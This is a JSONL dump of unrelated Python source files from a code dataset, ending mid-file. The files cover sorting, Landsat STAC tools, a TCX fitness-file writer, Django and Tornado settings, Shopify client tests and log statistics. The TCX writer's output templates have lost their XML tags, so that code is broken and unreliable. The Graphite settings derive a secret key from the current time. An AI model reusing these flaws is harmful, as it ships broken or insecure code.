left, pivot - 1)\n quick_sort(array, pivot + 1, right)\n\n# testing the algorithm\nprint(\"\\nHoare partition scheme------\")\nprint(\"Quick sort O(nlogn) algorithm:\\n\")\n\n# array before sorting\narray = [9, 8, 7, 6, 5, 4, 3, 2, 1]\nprint(\"Array before sorting\")\nprint(array)\n\n# test the quick sort algorithm\nprint(\"Array after sorting\")\nquick_sort(array, 0, len(array)-1)\nprint(array)","sub_path":"Algorithms Techniques/1. Sorting and Selection/quick-sort/quickSortHoare.py","file_name":"quickSortHoare.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"422502123","text":"import os\nfrom datetime import datetime\n\nLOG_DIR = '/var/log/graphite'\nif os.getenv(\"CARBONLINK_HOSTS\"):\n CARBONLINK_HOSTS = os.getenv(\"CARBONLINK_HOSTS\").split(',')\n\nif os.getenv(\"CLUSTER_SERVERS\"):\n CLUSTER_SERVERS = os.getenv(\"CLUSTER_SERVERS\").split(',')\n\nif os.getenv(\"MEMCACHE_HOSTS\"):\n CLUSTER_SERVERS = os.getenv(\"MEMCACHE_HOSTS\").split(',')\n\nif os.getenv(\"WHISPER_DIR\"):\n WHISPER_DIR = os.getenv(\"WHISPER_DIR\")\n\nCARBONLINK_QUERY_BULK = True\n\nSECRET_KEY = str(datetime.now())\n","sub_path":"web/config/local_settings.py","file_name":"local_settings.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"12968303","text":"import os\n\nimport click\nimport pystac\n\nfrom stactools.landsat.utils import transform_stac_to_stac\nfrom stactools.landsat.stac import create_stac_item\n\n\ndef create_landsat_command(cli):\n \"\"\"Creates a command group for working\n with Landsat metadata from USGS' Collection 2\n \"\"\"\n @cli.group(\n 'landsat',\n short_help=(\"Commands for working with Landsat Collection 2 metadata.\")\n )\n def landsat():\n pass\n\n @landsat.command(\n \"create-item\",\n short_help=\"Create a STAC item from collection 2 scene metadata.\")\n @click.option(\"--level\",\n type=click.Choice(['level-1', 'level-2'],\n case_sensitive=False),\n default=\"level-2\",\n show_default=True,\n help=\"Product level to process\")\n @click.option(\"--mtl\", required=True, help=\"HREF to an MTL file.\")\n @click.option(\"--output\",\n required=True,\n help=\"HREF of diretory in which to write the item.\")\n def create_item_cmd(level: str, mtl: str, output: str):\n \"\"\"Creates a STAC Item for a Landsat 8 C2 Level-2 scene's products.\n\n All asset paths are based on the MTL path, as all assets are assumed to\n reside in the same directory/blob prefix/etc.\n \"\"\"\n if level != 'level-2':\n raise click.BadOptionUsage(\"level\",\n \"Only level-2 currently implemented.\")\n\n item = create_stac_item(mtl_xml_href=mtl)\n item.set_self_href(os.path.join(output, f'{item.id}.json'))\n item.save_object()\n\n @landsat.command(\n \"convert\",\n short_help=\"Convert a USGS STAC 0.7 Item to an updated STAC Item\")\n @click.option(\"--stac\", \"-s\", required=True, help=\"Path to a STAC file.\")\n @click.option(\n \"--enable-proj\",\n \"-p\",\n is_flag=True,\n help=\"Enable the proj extension. Requires access to blue band.\")\n @click.option(\"--dst\", \"-d\", help=\"Output directory\")\n def convert_cmd(stac, enable_proj, dst):\n in_item = pystac.Item.from_file(stac)\n item = transform_stac_to_stac(in_item, enable_proj=enable_proj)\n\n item_path = os.path.join(dst, '{}.json'.format(item.id))\n item.set_self_href(item_path)\n item.save_object()\n\n return landsat\n","sub_path":"src/stactools/landsat/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"526686666","text":"# Write a Python Pandas program to convert the first column of a DataFrame as a Series.\n\n# start\n# import modules\n\nimport pandas as pd\ndf = pd.DataFrame({'x': [4, 34, 12, 40, 82, 42], 'y': [43, 25, 76, 89, 43, 10], 'z': [72, 52, 80, 72, 134, 42]})\n# df = pd.DataFrame(data=d)\nprint((\"Original DataFrame\") + str(df))\n# print(df)\ns = df.iloc[:,0]\n\nprint((\"First column converted to series: \\n\") + str(s))\n\n# print(\"\\n1st column as a Series:\")\n# print(s)\n# print(type(s))\n","sub_path":"Pandas exercises/DataSeries/8. Convert first column of DataFrame as a series.py","file_name":"8. Convert first column of DataFrame as a series.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"566901321","text":"\"\"\" Simple CSV writer for Schwinn 810 \"\"\"\n\nfrom __future__ import print_function\nimport sys,os\nimport subprocess\nimport csv\nimport logging\nfrom writer import *\nfrom pytz import timezone, utc\nfrom datetime import datetime, timedelta\n\n_log = logging.getLogger(__name__)\n\ntz = utc #timezone(\"UTC\")\n\nopen_extra = {}\nif sys.version_info >= (3,0):\n open_extra[\"newline\"] = ''\n\nclass WriterTCX(Writer):\n \"\"\" TCX files writer \"\"\"\n\n track_keys = [\"Start\", \"End\", \"Laps\", \"MaxHeart\", \"Heart\", \"MaxSpeed\", \\\n \"Speed\", \"x4\", \"x5\", \"Points\", \"Track\"]\n lap_keys = [\"Time\", \"Speed\", \"Lap\", \"Distance\", \"kcal\", \"MaxSpeed\", \\\n \"autolap\", \"Beats\", \"sec\", \"MaxHeart\", \"MinHeart\", \\\n \"InZone\", \"y4\", \"Elevation\", \"Track\"]\n point_keys = [\"Distance\", \"Speed\", \"Time\", \"Heart\", \"x1\", \"InZone\", \\\n \"Latitude\", \"Longitude\", \"kcal\", \"Elevation\", \"No\", \"Track\"]\n waypoint_keys = [\"Time\", \"Name\", \"Latitude\", \"Longitude\",\"x1\",\"x2\",\"Elevation\",\"No\"]\n settings_keys = [\"Female\", \"Age\", \"Metric\", \"x3\", \"kg\", \"cm\", \"zone_active\", \\\n \"zone1_low\", \"zone1_high\", \"zone2_low\", \"zone2_high\", \"zone3_low\",\\\n \"zone3_high\", \"zone_alarm\", \"x5\", \"Autolap\", \"Contrast\", \"x8\", \"NightMode\", \\\n \"y2\", \"lb\", \"in\", \"24hr\", \"y6\", \"y7\", \"y8\", \"z1\", \"z2\"]\n\n def __init__(self, dir, hook=None):\n self.dir = dir\n self.hook = hook\n \n self.lapFile = None\n self.lapWriter = None\n\n self.ptsFile = None\n self.ptsWriter = None\n self.tracks_processed = []\n\n #name = os.path.join(self.dir, \"waypoints.csv\")\n #wptFile = open(name, \"wb\", **open_extra)\n #self.wptWriter = csv.DictWriter(wptFile, self.waypoint_keys)\n #self.wptWriter.writeheader()\n\n def output(self, text):\n print(text, file=self.trkFile)\n\n def add_track(self, track):\n \"\"\" Append track to database \"\"\"\n name = os.path.join(self.dir, '%s.tcx' % track['Track'])\n track['Filename'] = name\n self.trkFile = open(name, \"wb\", **open_extra)\n self.open_track(track)\n\n for lap in track['LapData']:\n self.add_lap(lap)\n\n self.close_track()\n self.trkFile.close()\n\n self.tracks_processed.append(track)\n\n\n def open_track(self, track):\n track_start = track[\"Start\"]\n self.output(\"\"\"\n\n\n \n \n {:s}\"\"\".format(track_start.strftime(\"%Y-%m-%dT%H:%M:%SZ\")))\n\n\n\n def open_lap(self, lap):\n \"\"\" Add a lap to the tcx file \"\"\"\n time = float(lap[\"Time\"])\n kcal = int(float(lap[\"kcal\"]))\n lap_dist = float(lap[\"Distance\"])*1.e3\n beats = int(lap[\"Beats\"])\n try:\n lap_start = lap['Start'].strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n except Exception as e:\n print(lap)\n raise e\n \n duration_secs = lap['DurationSecs']\n \n self.output(\"\"\" \n {:f}\n {:f}\n {:0.1f}\n {:d}\n {:d}\"\"\".format(lap_start, \\\n duration_secs, \\\n lap['LengthMeters'], \\\n lap[\"MaxSpeed\"], \\\n int(lap['kcalDelta']), \\\n int(lap['BeatsDelta']/(duration_secs))))\n heart_max = int(lap[\"MaxHeart\"])\n if heart_max>0:\n self.output(\"\"\" {:d}\"\"\".format(heart_max))\n self.output(\"\"\" Active\n Location\n \"\"\")\n\n def add_lap(self, lap):\n _log.debug(\"writing lap with {:d} points\".format(len(lap['PointData'])))\n self.open_lap(lap)\n for point in lap['PointData']:\n self.add_point(point, lap)\n self.close_lap()\n\n def add_point(self, point, parent_lap):\n \"\"\" Append point to a open lap \"\"\"\n time = tz.localize(point[\"Time\"])\n dist = float(point[\"Distance\"])*1.e3\n self.output(\"\"\" \n \n \n {:f}\n {:f}\n \n {:f}\"\"\".format(time.astimezone(utc).strftime(\"%Y-%m-%dT%H:%M:%SZ\"), \\\n point[\"Latitude\"], \\\n point[\"Longitude\"], \\\n dist))\n if parent_lap['HasElevation']:\n self.output(\"\"\" {:d}\"\"\".format(int(point[\"Elevation\"])))\n heart = int(float(point[\"Heart\"]))\n if heart > 0:\n self.output(\"\"\" {:d}\n Present\"\"\".format(heart))\n else:\n self.output(\" Absent\")\n\n self.output(\" \")\n\n def close_lap(self):\n \"\"\" Add the tags to close the lap \"\"\"\n self.output(\" \")\n self.output(\" \")\n\n def close_track(self):\n \"\"\" Add the tags to close the track \"\"\"\n self.output(\"\")\n self.output(\"\")\n self.output(\"\")\n\n def add_waypoint(self, wp):\n \"\"\" Append point to a database \"\"\"\n # do nowt\n \n\n def save_settings(self, s):\n name = os.path.join(self.dir, \"settings.csv\")\n f = open(name, \"wb\", **open_extra)\n w = csv.DictWriter(f, self.settings_keys)\n w.writeheader()\n w.writerow(s)\n\n def tracks_written(self):\n return self.tracks_processed\n\nif __name__ == '__main__':\n pass\n","sub_path":"src/core/writer_tcx.py","file_name":"writer_tcx.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"434505206","text":"from collections import deque\n\ninput = \"input.in\"\nfile = open(input, \"r\")\n\nfor line in file:\n\tsp = line.split()\n\tn, v = int(sp[0]), int(sp[6])\n\n\tscore = [0] * n\n\tch = deque()\n\tch.append(0)\n\t\n\tfor i in range(1, v+1):\n\t\t#print(i,idx, ch)\n\t\tif i%23 != 0:\n\t\t\tch.rotate(-1)\n\t\t\tch.append(i)\n\t\telse:\n\t\t\tch.rotate(7)\n\t\t\tscore[i%n] += i + ch.pop()\n\t\t\tch.rotate(-1)\n\tprint(max(score))\n","sub_path":"2018/day09/q1/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"255782011","text":"# -*- coding: UTF-8 -*-\n\"\"\"\n check project\n ~~~~~~~~\n :copyright: (c) 2017 by bh\n\"\"\"\n\nimport os\nfrom site_config import config\n\n# To get request.remote_ip when running tornado behid a reverse proxy\n# we need xheaders to True\nserver_settings = {\n \"xheaders\": True,\n}\n\napp_settings = {\n \"debug\": config['DEBUG'],\n \"cookie_secret\": config['COOKIE_SECRET'],\n \"static_path\": os.path.join(os.path.dirname(__file__), \"..\", \"static\"),\n \"template_path\": os.path.join(os.path.dirname(__file__), \"..\", \"templates\"),\n}\n","sub_path":"www/server/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"127179866","text":"\"\"\"Module for generating log data statistics.\"\"\"\nfrom pathlib import Path\nfrom typing import Dict, Optional, Sequence, Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nfrom biopsykit.carwatch_logs import LogData\nfrom biopsykit.io.carwatch_logs import load_logs_all_subjects\nfrom biopsykit.utils._types import path_t\n\n\nclass LogStatistics:\n \"\"\"Class to compute statistics from CARWatch log data collected during one study.\"\"\"\n\n def __init__(self, base_folder: path_t):\n \"\"\"Initialize a new ``LogStatistics`` instance.\n\n Parameters\n ----------\n base_folder : :class:`~pathlib.Path` or str\n base folder path to log data from all subjects of one study\n\n \"\"\"\n self.path: Path = Path(base_folder)\n self.log_dict: Dict[str, pd.DataFrame] = load_logs_all_subjects(self.path, return_df=False)\n self.log_data: Sequence[LogData] = [LogData(df) for df in self.log_dict.values()]\n\n def conditions(self) -> pd.DataFrame:\n \"\"\"Return statistics of study conditions available in the log data.\n\n Returns\n -------\n :class:`~pandas.DataFrame`\n dataframe with study conditions and their frequency\n\n \"\"\"\n series = pd.Series([log.condition for log in self.log_data], name=\"count\")\n df = series.value_counts()\n df = df.reset_index().rename({\"index\": \"condition\"}, axis=1)\n return df\n\n def android_versions(self, skip_na: Optional[bool] = True) -> pd.DataFrame:\n \"\"\"Return statistics of Android versions of the smartphones used in the study.\n\n Parameters\n ----------\n skip_na : bool, optional\n ``True`` to exclude Android versions that are not present in the study from the result dataframe,\n ``False`` otherwise. Default: ``True``\n\n Returns\n -------\n :class:`~pandas.DataFrame`\n dataframe with all available Android versions and their frequency\n\n \"\"\"\n version_list = [log.android_version for log in self.log_data]\n hist = np.bincount(version_list, minlength=30)\n df = pd.DataFrame(data=hist, columns=[\"count\"], index=range(0, len(hist)))\n # remove 1 - 20 as minimum supported android version is SDK level 21\n df.drop(list(range(1, 21)), axis=0, inplace=True)\n\n if skip_na:\n df.drop(0, axis=0, inplace=True)\n else:\n df.rename({0: \"n/a\"}, inplace=True)\n\n df = df.reset_index().rename({\"index\": \"android_version\"}, axis=1)\n return df\n\n def app_versions(self) -> pd.DataFrame:\n \"\"\"Return statistics of CARWatch App versions used in the study.\n\n Returns\n -------\n :class:`~pandas.DataFrame`\n dataframe with all available CARWatch App versions and their frequency\n\n \"\"\"\n series = pd.Series([log.app_version for log in self.log_data], name=\"count\")\n\n df = series.value_counts().reset_index().rename({\"index\": \"app_version\"}, axis=1)\n # df.sort_values(by=['count', 'app_version'], ascending=[False, True], inplace=True)\n return df\n\n def manufacturer(self, skip_na: Optional[bool] = True) -> pd.DataFrame:\n \"\"\"Return statistics of the manufacturer names of smartphones used in the study.\n\n Parameters\n ----------\n skip_na : bool, optional\n ``True`` to exclude non-available manufacturer names from the result dataframe,\n ``False`` otherwise. Default: ``True``\n\n Returns\n -------\n :class:`~pandas.DataFrame`\n dataframe with all available smartphone manufacturers and their frequency\n\n \"\"\"\n series = pd.Series([log.manufacturer for log in self.log_data], name=\"count\")\n if skip_na:\n series = series[~series.str.contains(\"n/a\")]\n\n df = series.value_counts().reset_index().rename({\"index\": \"manufacturer\"}, axis=1)\n df.sort_values(by=[\"count\", \"manufacturer\"], ascending=[False, True], inplace=True)\n return df\n\n def models(self, skip_na: Optional[bool] = True) -> pd.DataFrame:\n \"\"\"Return statistics of the smartphone models used in the study.\n\n Parameters\n ----------\n skip_na : bool, optional\n ``True`` to exclude non-available smartphone model names from the result dataframe,\n ``False`` otherwise. Default: ``True``\n\n Returns\n -------\n :class:`~pandas.DataFrame`\n dataframe with all available smartphone model names and their frequency\n\n \"\"\"\n series = pd.Series([log.model for log in self.log_data], name=\"count\")\n if skip_na:\n series = series[~series.str.contains(\"n/a\")]\n df: pd.DataFrame = series.value_counts()\n\n df = df.reset_index().rename({\"index\": \"model\"}, axis=1)\n df.sort_values(by=[\"count\", \"model\"], ascending=[False, True], inplace=True)\n return df\n\n def finished_days(self) -> pd.DataFrame:\n \"\"\"Return statistics of finished study days per subject.\n\n Returns\n -------\n :class:`~pandas.DataFrame`\n dataframe with frequency of finished study days\n\n \"\"\"\n series = pd.Series([log.num_finished_days for log in self.log_data], name=\"count\")\n df = series.value_counts(sort=False)\n\n df = df.reset_index().rename({\"index\": \"finished_days\"}, axis=1)\n return df\n\n def days(self) -> pd.DataFrame:\n \"\"\"Return statistics of recording days in the study.\n\n Returns\n -------\n :class:`~pandas.DataFrame`\n dataframe with frequency of recording days\n\n \"\"\"\n series = pd.Series(np.concatenate([log.log_dates for log in self.log_data]), name=\"count\")\n df = series.value_counts(sort=False)\n df.sort_index(inplace=True)\n\n df = df.reset_index().rename({\"index\": \"logging_days\"}, axis=1)\n return df\n\n def get_plot(self, plot_id: str, **kwargs) -> Tuple[plt.Figure, plt.Axes]: # pylint:disable=too-many-branches\n \"\"\"Return barplot to visualize log data statistics for one data type.\n\n Parameters\n ----------\n plot_id : str\n type of data to plot\n\n Returns\n -------\n fig : :class:`matplotlib.figure.Figure`\n figure object\n ax : :class:`matplotlib.axes.Axes`\n axes object\n\n \"\"\"\n ax: plt.Axes = kwargs.pop(\"ax\", None)\n if ax is None:\n fig, ax = plt.subplots()\n else:\n fig = ax.get_figure()\n\n if plot_id in [\"condition\", \"conditions\"]:\n df = self.conditions()\n elif plot_id in [\"manufacturer\", \"manufacturers\"]:\n df = self.manufacturer()\n elif plot_id in [\"android\", \"android_version\", \"android_versions\"]:\n df = self.android_versions()\n elif plot_id in [\"app\", \"app_version\", \"app_versions\"]:\n df = self.app_versions()\n elif plot_id in [\"model\", \"models\"]:\n df = self.models()\n elif plot_id in [\"finished\", \"finished_days\"]:\n df = self.finished_days()\n elif plot_id in [\"days\", \"logging_days\"]:\n df = self.days()\n else:\n raise ValueError(\"Invalid plot_id '{}'!\".format(plot_id))\n\n palette = sns.cubehelix_palette(len(df), start=0.5, rot=-0.75)\n\n cols = df.columns\n ax = sns.barplot(x=cols[0], y=cols[1], data=df, ax=ax, palette=palette)\n\n if plot_id in [\"model\", \"days\"]:\n ax.set_xticklabels(ax.get_xticklabels(), rotation=45, ha=\"right\")\n\n return fig, ax\n","sub_path":"src/biopsykit/carwatch_logs/log_statistics.py","file_name":"log_statistics.py","file_ext":"py","file_size_in_byte":7640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"231756601","text":"from cumulusci.tasks.github.base import BaseGithubTask\n\nclass GithubOrgUsers(BaseGithubTask):\n task_options = {\n \"org\": {\n \"description\": \"The Github Organization name\",\n \"required\": True,\n },\n \"file\": {\n \"description\": \"Path to a text file that contains a list of usernames (1 per line)\",\n \"required\": True,\n },\n \"team\": {\n \"description\": \"Github Org Team Name\",\n \"required\": True,\n },\n }\n def _run_task(self):\n org = self.github.organization(self.options[\"org\"])\n team = None\n for org_team in org.teams():\n if org_team.name == self.options[\"team\"]:\n team = org_team\n break\n if not team:\n team = org.create_team(self.options[\"team\"]) \n\n with open(self.options[\"file\"]) as f:\n for line in f.readlines():\n username = line.strip()\n user = self.github.user(username)\n self.logger.info(\"adding {} to team {}\".format(username, team.name))\n org.invite([team.id], invitee_id = user.id)\n\n #getting into Github API\n import pdb; pdb.set_trace()","sub_path":"tasks/github_org_users.py","file_name":"github_org_users.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"153387960","text":"\"\"\"MyWeb URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom liblab import views as liblab_views\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', liblab_views.index , name='index'),\n url(r'^index/', liblab_views.index, name='index'),\n url(r'^books/', liblab_views.books, name='books'),\n url(r'^dvds/', liblab_views.dvds, name='dvds'),\n url(r'^others/', liblab_views.others, name='others'),\n url(r'^about/', liblab_views.about, name='about'),\n url(r'^myacct/', liblab_views.myacct, name='myacct'),\n url(r'^register/', liblab_views.register, name='register'),\n url(r'^base/', liblab_views.base, name='base'),\n]\n","sub_path":"MyWeb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"305426169","text":"from time import monotonic\nfrom unittest.mock import AsyncMock\n\nimport pytest\nfrom pydantic import validator\nfrom pydantic.dataclasses import dataclass\n\nfrom spylib import Store\nfrom spylib.exceptions import ShopifyCallInvalidError\n\n\n@dataclass\nclass MockHTTPResponse:\n status_code: int\n jsondata: dict\n headers: dict = None # type: ignore\n\n @validator('headers', pre=True, always=True)\n def set_id(cls, fld):\n return fld or {'X-Shopify-Shop-Api-Call-Limit': '39/40'}\n\n def json(self):\n return self.jsondata\n\n\n@pytest.mark.asyncio\nasync def test_store_rest_happypath(mocker):\n store = Store(store_id='TEST', name='test-store', access_token='Te5tM3')\n\n shopify_request_mock = mocker.patch(\n 'httpx.AsyncClient.request',\n new_callable=AsyncMock,\n return_value=MockHTTPResponse(status_code=200, jsondata={'success': True}),\n )\n\n jsondata = await store.shoprequest(\n goodstatus=200, debug='Test failed', endpoint='/test.json', method='get'\n )\n\n shopify_request_mock.assert_called_once()\n\n assert jsondata == {'success': True}\n\n # 80 from assuming Shopify plus then 1 used just now.\n assert store.tokens == 79\n\n\n@pytest.mark.asyncio\nasync def test_store_rest_badrequest(mocker):\n store = Store(store_id='TEST', name='test-store', access_token='Te5tM3')\n\n shopify_request_mock = mocker.patch(\n 'httpx.AsyncClient.request',\n new_callable=AsyncMock,\n return_value=MockHTTPResponse(\n status_code=422, jsondata={'errors': {'title': [\"can't be blank\"]}}\n ),\n )\n\n with pytest.raises(ShopifyCallInvalidError):\n await store.shoprequest(\n goodstatus=201,\n debug='Test failed',\n endpoint='/products.json',\n method='post',\n json={'product': {'body_html': 'A mystery!'}},\n )\n\n shopify_request_mock.assert_called_once()\n\n\nparams = [\n pytest.param(0, 1000, 79, id='Last call hit rate limit, long time ago'),\n pytest.param(0, 20, 79, id='Last call hit rate limit, 20s ago'),\n pytest.param(0, 10, 39, id='Last call hit rate limit, 10s ago'),\n # Wait 1 second to get 4 then use 1 so 3\n pytest.param(0, 0, 3, id='Last call that hit rate limit just happened'),\n]\n\n\n@pytest.mark.parametrize('init_tokens, time_passed, expected_tokens', params)\n@pytest.mark.asyncio\nasync def test_store_rest_ratetokens(init_tokens, time_passed, expected_tokens, mocker):\n store = Store(store_id='TEST', name='test-store', access_token='Te5tM3')\n\n # Simulate that there is only 2 calls available before hitting the rate limit.\n # If we set this to zero, then the code will wait 1 sec which is not great to keep the tests\n # fast\n store.tokens = init_tokens\n store.updated_at = monotonic() - time_passed # A looooong time ago\n\n shopify_request_mock = mocker.patch(\n 'httpx.AsyncClient.request',\n new_callable=AsyncMock,\n return_value=MockHTTPResponse(status_code=200, jsondata={'success': True}),\n )\n await store.shoprequest(\n goodstatus=200, debug='Test failed', endpoint='/test.json', method='get'\n )\n\n shopify_request_mock.assert_called_once()\n\n assert store.tokens == expected_tokens\n\n\n@pytest.mark.asyncio\nasync def test_store_graphql_happypath(mocker):\n store = Store(store_id='TEST', name='test-store', access_token='Te5tM3')\n\n query = '''\n {\n shop {\n name\n }\n }'''\n data = {'shop': {'name': 'graphql-admin'}}\n gql_response = {\n 'data': data,\n 'extensions': {\n 'cost': {\n 'requestedQueryCost': 1,\n 'actualQueryCost': 1,\n 'throttleStatus': {\n 'maximumAvailable': 1000,\n 'currentlyAvailable': 999,\n 'restoreRate': 50,\n },\n }\n },\n }\n\n shopify_request_mock = mocker.patch(\n 'httpx.AsyncClient.request',\n new_callable=AsyncMock,\n return_value=MockHTTPResponse(status_code=200, jsondata=gql_response),\n )\n\n jsondata = await store.execute_gql(query=query)\n\n shopify_request_mock.assert_called_once()\n\n assert jsondata == data\n\n\n@pytest.mark.asyncio\nasync def test_store_graphql_badquery(mocker):\n store = Store(store_id='TEST', name='test-store', access_token='Te5tM3')\n\n query = '''\n {\n shopp {\n name\n }\n }'''\n error_msg = \"Field 'shopp' doesn't exist on type 'QueryRoot'\"\n gql_response = {\n 'errors': [\n {\n 'message': error_msg,\n 'locations': [{'line': 2, 'column': 3}],\n 'path': ['query', 'shopp'],\n 'extensions': {\n 'code': 'undefinedField',\n 'typeName': 'QueryRoot',\n 'fieldName': 'shopp',\n },\n }\n ]\n }\n\n shopify_request_mock = mocker.patch(\n 'httpx.AsyncClient.request',\n new_callable=AsyncMock,\n return_value=MockHTTPResponse(status_code=200, jsondata=gql_response),\n )\n\n with pytest.raises(ValueError, match=f'^GraphQL query is incorrect:\\n{error_msg}$'):\n await store.execute_gql(query=query)\n\n shopify_request_mock.assert_called_once()\n\n\n@pytest.mark.asyncio\nasync def test_store_graphql_tokeninvalid(mocker):\n store = Store(store_id='TEST', name='test-store', access_token='INVALID')\n\n query = '''\n {\n shop {\n name\n }\n }'''\n gql_response = {\n 'errors': '[API] Invalid API key or access token (unrecognized login or wrong password)'\n }\n\n shopify_request_mock = mocker.patch(\n 'httpx.AsyncClient.request',\n new_callable=AsyncMock,\n return_value=MockHTTPResponse(status_code=200, jsondata=gql_response),\n )\n\n with pytest.raises(ConnectionRefusedError):\n await store.execute_gql(query=query)\n\n shopify_request_mock.assert_called_once()\n","sub_path":"tests/test_store.py","file_name":"test_store.py","file_ext":"py","file_size_in_byte":5951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"424377282","text":"from tree.my_lib import *\n# 先构建再查询\nclass Solution:\n def __init__(self):\n self.table = {}\n\n def build_table(self, root):\n if not root:\n return\n self.table[root.val] = 1\n self.build_table(root.left)\n self.build_table(root.right)\n\n def findTarget(self, root: TreeNode, k: int) -> bool:\n if not root:\n return False\n if not self.table:\n self.build_table(root)\n tmp = k - root.val\n if tmp != root.val and tmp in self.table:\n return True\n left = self.findTarget(root.left, k)\n right = self.findTarget(root.right, k)\n return left or right\n\n# 边构建边查询,效率更高\nclass Solution:\n def __init__(self):\n self.table = {}\n\n def build_table(self, root, k):\n if not root:\n return False\n self.table[root.val] = 1\n tmp = k - root.val\n if tmp != root.val and tmp in self.table: # 即使当前没有查到,如果真的存在,遍历其他节点也会查到,所以不会返回错误答案\n return True\n return self.build_table(root.left, k) or self.build_table(root.right, k)\n\n def findTarget(self, root: TreeNode, k: int) -> bool:\n if not root:\n return False\n return self.build_table(root, k)","sub_path":"tree/653.py","file_name":"653.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"148010120","text":"def update_alarm(alarm):\n alarm = alarm.as_dict()\n values = []\n sql_query = (' UPDATE alarm'\n ' SET')\n\n # Note (alexstav): 'user_id' and 'project_id' may be None-type\n if alarm['user_id']:\n user_id_q = (\"SELECT id FROM users\"\n \" WHERE uuid = %s\")\n with PoolConnection(self.conn_pool) as db:\n db.execute(user_id_q, (alarm['user_id'],))\n user_resp = db.fetchone()\n if user_resp:\n user_id = user_resp.id\n sql_query += \" user_id = %s,\"\n values.append(user_id)\n else:\n LOG.debug(_(\"User does not exist in DB\"))\n return\n\n if alarm['project_id']:\n project_id_q = ('SELECT id from projects'\n ' WHERE uuid = %s')\n with PoolConnection(self.conn_pool) as db:\n db.execute(project_id_q, (alarm['project_id'],))\n project_resp = db.fetchone()\n if project_resp:\n project_id = project_resp.id\n sql_query += \" project_id = %s,\"\n values.append(project_id)\n else:\n LOG.debug(_(\"Project does not exist in DB\"))\n return\n\n if 'enabled' in alarm:\n sql_query += ' enabled = %s,'\n values.append(alarm['enabled'])\n if 'name' in alarm:\n sql_query += ' name = %s,'\n values.append(alarm['name'])\n if 'description' in alarm:\n sql_query += ' description = %s,'\n values.append(alarm['description'])\n if 'state' in alarm:\n sql_query += ' state = %s,'\n values.append(alarm['state'])\n if 'alarm_actions' in alarm:\n sql_query += ' alarm_actions = %s,'\n values.append(Json(alarm['alarm_actions']))\n if 'ok_actions' in alarm:\n sql_query += ' ok_actions = %s,'\n values.append(Json(alarm['ok_actions']))\n if 'insufficient_data_actions' in alarm:\n sql_query += ' insufficient_data_actions = %s,'\n values.append(Json(alarm['insufficient_data_actions']))\n if 'repeat_actions' in alarm:\n sql_query += ' repeat_actions = %s,'\n values.append(alarm['repeat_actions'])\n if 'time_constraints' in alarm:\n sql_query += ' time_constraints = %s,'\n values.append(Json(alarm['time_constraints']))\n if 'rule' in alarm:\n sql_query += ' rule = %s'\n values.append(Json(alarm['rule']))\n\n sql_query = sql_query.rstrip(',')\n sql_query += ' WHERE alarm_id = %s'\n values.append(alarm['alarm_id'])\n\n with PoolConnection(self.conn_pool, cursor_factory=DictCursor) as db:\n db.execute(sql_query, values)\n # returns first Alarm object from generator\n stored_alarm = get_alarms(alarm_id=alarm['alarm_id']).next()\n return stored_alarm\n","sub_path":"Alarms/update_alarm_controller.py","file_name":"update_alarm_controller.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"636000883","text":"import json\n\nfile_path = \"./sample.json\"\n\ndata = {}\ndata['posts'] = []\ndata['posts'].append({\n \"title\": \"How to get stroage size\",\n \"url\": \"https://codechacha.com/ko/get-free-and-total-size-of-volumes-in-android/\",\n \"draft\": \"false\"\n})\ndata['posts'].append({\n \"title\": \"Android Q, Scoped Storage\",\n \"url\": \"https://codechacha.com/ko/android-q-scoped-storage/\",\n \"draft\": \"false\"\n})\nprint(data)\n\nwith open(file_path, 'w') as outfile:\n json.dump(data, outfile, indent=4)","sub_path":"dict_json_store.py","file_name":"dict_json_store.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"323714382","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport sys\nfrom clize import clize, run\nimport nnpy\nimport time\nimport 